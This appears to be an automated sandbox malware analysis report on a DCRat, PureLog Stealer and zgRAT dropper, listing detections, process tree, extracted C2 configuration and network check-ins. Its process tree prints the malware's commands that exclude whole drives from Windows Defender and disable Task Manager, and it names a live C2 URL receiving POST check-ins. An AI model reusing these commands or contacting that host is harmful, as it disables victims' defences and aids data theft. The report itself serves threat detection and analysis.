Windows Analysis Report
OisrvsB6Ea.exe

Overview

General Information

Sample name: OisrvsB6Ea.exe (renamed because original name is a hash value)
Original sample name: 092F45DAC00EF24F3836DBFE18DFA931.exe
Analysis ID: 1589235
MD5: 092f45dac00ef24f3836dbfe18dfa931
SHA1: 7583f7a96b649ff903b79615ac889fdd9c1fa94d
SHA256: 6bc67978f583db1ef99eb832b456c978b8c42a5233f9ed5810fed58455e6cd6f
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Module File Created By Non-PowerShell Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • OisrvsB6Ea.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\OisrvsB6Ea.exe" MD5: 092F45DAC00EF24F3836DBFE18DFA931)
    • wscript.exe (PID: 7496 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7940 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • ComrefNetsvc.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe" MD5: 7A6B9E23ECCB90B36EB6A4FE87427D41)
          • powershell.exe (PID: 8016 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8024 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8040 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8076 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8108 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8144 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7172 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1744 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1544 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2652 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1704 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7252 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7480 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 9060 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 7440 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7552 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6840 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8504 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 8924 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • svchost.exe (PID: 9004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": "http://588538cm.renyash.ru/polldle", "MUTEX": "DCR_MUTEX-IlTr7bwNxEio1IRNv7Cv", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000008.00000000.1964321425.0000000000012000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1668531861.00000000053CA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: ComrefNetsvc.exe PID: 7956 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
8.0.ComrefNetsvc.exe.10000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
8.0.ComrefNetsvc.exe.10000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, ProcessId: 7956, TargetFilename: C:\Program Files (x86)\microsoft office\Office16\dasHost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe", ParentImage: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, ParentProcessId: 7956, ParentProcessName: ComrefNetsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 8016, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\OisrvsB6Ea.exe", ParentImage: C:\Users\user\Desktop\OisrvsB6Ea.exe, ParentProcessId: 7436, ParentProcessName: OisrvsB6Ea.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , ProcessId: 7496, ProcessName: wscript.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, ProcessId: 7956, TargetFilename: C:\Program Files\WindowsPowerShell\Modules\sihost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe", ParentImage: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, ParentProcessId: 7956, ParentProcessName: ComrefNetsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 8016, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\OisrvsB6Ea.exe", ParentImage: C:\Users\user\Desktop\OisrvsB6Ea.exe, ParentProcessId: 7436, ParentProcessName: OisrvsB6Ea.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , ProcessId: 7496, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe", ParentImage: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, ParentProcessId: 7956, ParentProcessName: ComrefNetsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 8016, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 9004, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T23:32:51.567229+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.38.84 | 80 | TCP

AV Detection

Source: http://588538cm.renyash.ru/polldle.php | Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://588538cm.renyash.ru/polldle", "MUTEX": "DCR_MUTEX-IlTr7bwNxEio1IRNv7Cv", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe | ReversingLabs: Detection: 83%
Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe | ReversingLabs: Detection: 83%
Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\BkJolhdT.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\DBQFDgRN.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\DjKnpLXK.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\FpiFczmJ.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\PVPluWhn.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\REWLTGNk.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\ZDjBezmV.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\amqbDjSR.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\pIbqPImn.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\xIogbBMY.log | ReversingLabs: Detection: 25%
Source: C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe | ReversingLabs: Detection: 83%
Source: OisrvsB6Ea.exe | ReversingLabs: Detection: 60%
Source: OisrvsB6Ea.exe | Virustotal: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe | Joe Sandbox ML: detected
Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe | Joe Sandbox ML: detected
Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe | Joe Sandbox ML: detected
Source: OisrvsB6Ea.exe | Joe Sandbox ML: detected
Source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp | String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
Source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp | String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-IlTr7bwNxEio1IRNv7Cv","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp | String decryptor: [["http://588538cm.renyash.ru/","polldle"]]
Source: OisrvsB6Ea.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe | Directory created: C:\Program Files\WindowsPowerShell\Modules\sihost.exe
Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe | Directory created: C:\Program Files\WindowsPowerShell\Modules\66fc9ff0ee96c2
Source: OisrvsB6Ea.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: OisrvsB6Ea.exe
Source: C:\Users\user\Desktop\OisrvsB6Ea.exe | Code function: 0_2_0027A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0027A69B
Source: C:\Users\user\Desktop\OisrvsB6Ea.exe | Code function: 0_2_0028C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0028C220
Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe | File opened: C:\Users\user\AppData\Local

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 104.21.38.84:80
Source: Joe Sandbox View | IP Address: 104.21.38.84
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 384 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2504 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 1616 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2504 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2496 | Expect: 100-continue | Connection: Keep-Alive
